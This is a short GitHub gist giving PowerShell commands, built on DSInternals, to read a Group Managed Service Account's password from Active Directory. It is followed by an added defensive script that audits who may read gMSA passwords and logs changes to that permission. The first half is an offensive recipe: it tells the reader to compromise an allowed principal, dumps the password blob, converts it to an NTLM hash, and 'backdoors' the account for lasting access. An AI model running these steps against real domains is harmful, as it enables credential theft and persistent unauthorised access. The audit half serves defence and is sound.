@NotMedic
Created January 15, 2020 14:04
Group Managed Service Account Password Retrieval
#From: https://www.dsinternals.com/en/retrieving-cleartext-gmsa-passwords-from-active-directory/
#Install the DSInternals PowerShell Module
Install-Module -Name DSInternals -Force
#Import it.
Import-Module DSInternals
#Identify which users can recover the GMSA Account's Password. Compromise one of those Principals.
Get-ADServiceAccount -Identity GMSAccount -Properties PrincipalsAllowedToRetrieveManagedPassword
#Get the GMSA Object and assign it to a variable
$gmsa = Get-ADServiceAccount -Identity GMSAccount -Properties 'msDS-ManagedPassword'
#Get the Managed Password data block into a Variable
$mp = $gmsa.'msDS-ManagedPassword'
#Decode the blob into its fields. The current password is random binary data, so it will not render as readable text.
$pt = ConvertFrom-AdManagedPasswordBlob $mp
#Convert just the password to a NTLM Hash
ConvertTo-NTHash $pt.SecureCurrentPassword
#Backdoor the GMSA Account so you can get the password whenever.
Set-ADServiceAccount -Identity GMSAccount -PrincipalsAllowedToRetrieveManagedPassword USER1 -Add
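From the defender's side, the last step is exactly what an audit should catch: a principal added to PrincipalsAllowedToRetrieveManagedPassword that nobody approved. The script below is an added example, not part of the original gist; it assumes the ActiveDirectory RSAT module, rights to read a domain controller's Security log, and a constructed allowlist of expected readers.

```powershell
# Added example, not part of the original gist: audit who can read each gMSA's
# password and surface recent changes to that permission on a domain controller.
# Assumes the ActiveDirectory RSAT module and rights to read the DC's Security log;
# the allowlist below is constructed for illustration.
Import-Module ActiveDirectory

# Expected readers per gMSA (sAMAccountName, including the trailing $) -> principal DNs.
$Expected = @{
    'GMSAccount$' = @('CN=SQL-Servers,OU=Groups,DC=example,DC=com')
}

function Get-UnexpectedGmsaReaders {
    param([hashtable]$Allowlist)
    $gmsas = Get-ADServiceAccount -Filter 'ObjectClass -eq "msDS-GroupManagedServiceAccount"' `
        -Properties PrincipalsAllowedToRetrieveManagedPassword
    foreach ($g in $gmsas) {
        $allowed = @($Allowlist[$g.SamAccountName])
        foreach ($p in @($g.PrincipalsAllowedToRetrieveManagedPassword)) {
            # Anything outside the allowlist is a finding: that principal can fetch the password.
            if ($allowed -notcontains $p) {
                [pscustomobject]@{ Account = $g.SamAccountName; Principal = $p }
            }
        }
    }
}

# PrincipalsAllowedToRetrieveManagedPassword is stored in the msDS-GroupMSAMembership
# attribute; with "Audit Directory Service Changes" enabled (and a SACL on the object),
# each write to it is logged as Security event 5136 on the DC that handled it.
function Get-GmsaMembershipChanges {
    param([int]$Days = 7)
    $filter = @{ LogName = 'Security'; Id = 5136; StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $x = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        if ($d['AttributeLDAPDisplayName'] -eq 'msDS-GroupMSAMembership') {
            [pscustomobject]@{
                Time      = $_.TimeCreated
                Actor     = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                Object    = $d['ObjectDN']
                Operation = $d['OperationType']   # %%14674 = value added, %%14675 = value deleted
            }
        }
    }
}

Get-UnexpectedGmsaReaders -Allowlist $Expected | Format-Table -AutoSize
Get-GmsaMembershipChanges -Days 30 | Format-Table -AutoSize
```

Run it on a domain controller; an empty first table and an unchanged membership history is the expected steady state, and any row in either table deserves a ticket.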